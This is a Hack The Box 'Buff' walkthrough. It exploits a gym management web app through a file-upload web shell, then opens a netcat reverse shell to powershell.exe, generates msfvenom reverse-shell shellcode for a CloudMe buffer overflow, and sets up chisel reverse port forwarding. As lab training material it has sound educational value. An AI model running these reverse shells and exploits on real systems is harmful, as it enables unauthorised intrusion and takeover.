Skip to main content

HTB Buff


Initial Recon

sudo nmap -sS -sV -sC > rec_ini

It seems only a http port is open at 8080

Upon visiting the web page it turns out that the website is using some kind of gym management software.

Trying to exploit the software

Get the exploit from the exploit-db. Run the exploit with the website url.


We see that we are running inside of xamp, with the user shaun.


Trying to get the privileges I get that only one privilege is enabled :

C:\xampp\htdocs\gym\upload> whoami /priv


Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

Although we will not be able to function properly with the shell that we have.

How does the exploit actually work ?

  1. It uses the /upload.php and sets up the id parameter to get upload a file called kamehameha.php
  2. To bypass the whitelist, it uses double extension, that means, that it uses two types of file extension, where the last one will be the acceptable one.
  3. The php file has the malicious php code which takes the parameter telepathy to execute code. So the attacker can essentially execute code from the server.
  4. Although we can access the allowed portions of the box, but we cannot essentially change the directory or do something useful.

Here we see that we can get the user.txt but we cannot change directories. We can essentially run netcat from the server and get a reverse shell on our box. I uploaded netcat and visited : 1331 -e powershell.exe

Here you can see that we have got a usefull shell.

We can essentially check the place of user.txt:

In order to upload the nc.exe and plink.exe use the kamehameha.php script and get them to the server using your own local machine.


Using Get-NetTCPConnection -State Listen we get a list of all running ports :

PS C:\xampp\htdocs\gym\upload> Get-NetTCPConnection -State Listen
Get-NetTCPConnection -State Listen

LocalAddress                        LocalPort RemoteAddress                       RemotePort State       AppliedSetting
------------                        --------- -------------                       ---------- -----       --------------
::                                  49669     ::                                  0          Listen                    
::                                  49668     ::                                  0          Listen                    
::                                  49667     ::                                  0          Listen                    
::                                  49666     ::                                  0          Listen                    
::                                  49665     ::                                  0          Listen                    
::                                  49664     ::                                  0          Listen                    
::                                  8080      ::                                  0          Listen                    
::                                  7680      ::                                  0          Listen                    
::                                  445       ::                                  0          Listen                    
::                                  135       ::                                  0          Listen                                        49669                             0          Listen                                        49668                             0          Listen                                        49667                             0          Listen                                        49666                             0          Listen                                        49665                             0          Listen                                        49664                             0          Listen                                      8888                             0          Listen                                        8080                             0          Listen                                        5040                             0          Listen                                      3306                             0          Listen                                   139                             0          Listen                                        135                             0          Listen                    

We see that a port 8888 is open which can only be accessed locally.

Also in the Downloads directory, there is a file called CloudMe_1112.exe. Also CloudMe.exe runs on the port 8888 and we have seen that the port 8888 is running. Upon looking online there can be an exploit found. But that exploit is written in python and we don’t have python on the target box.

Setting up the exploit

Download the exploit from exploit-db. It is very obvious that it is a buffer overflow exploit. After downloading the exploit, generate a custom shellcode for yourself and replace it with the one which is already there.

msfvenom -p windows/shell_reverse_tcp lhost= lport=4444 -f c

Since it runs on python2 the C format will only work. If you wanted to use python3, then you have to convert all the shellcode and opcodes along with the overflow to byte format. Then use a Windows box to convert the python file to exe, because there is no python on the target machine. You can use something like auto-py-tp-exe. Transfer the payload to the box using curl in the browser. Setup a netcat listener.

Getting Root

nc -nlvp 4444

Run the exploit inside the box :


You will get a shell as the adminstrator on you netcat listener.


Alternative method for exploiting the service

As we have already seen that the CloudMe service is running on port 8888 in the locahost of the target machine. What we can do is, we can port forward the service through our own machine and exploit it. This can be easily done using chisel Download chisel for both windows and linux, and get the windows version onto the target box.

On your own box run :

./chisel server -p 1080 --reverse

On the target box run :

.\chisel.exe client R:8887:

Now you can access the CloudMe service through your own box from the port 8887 ana directly use python to exploit the service.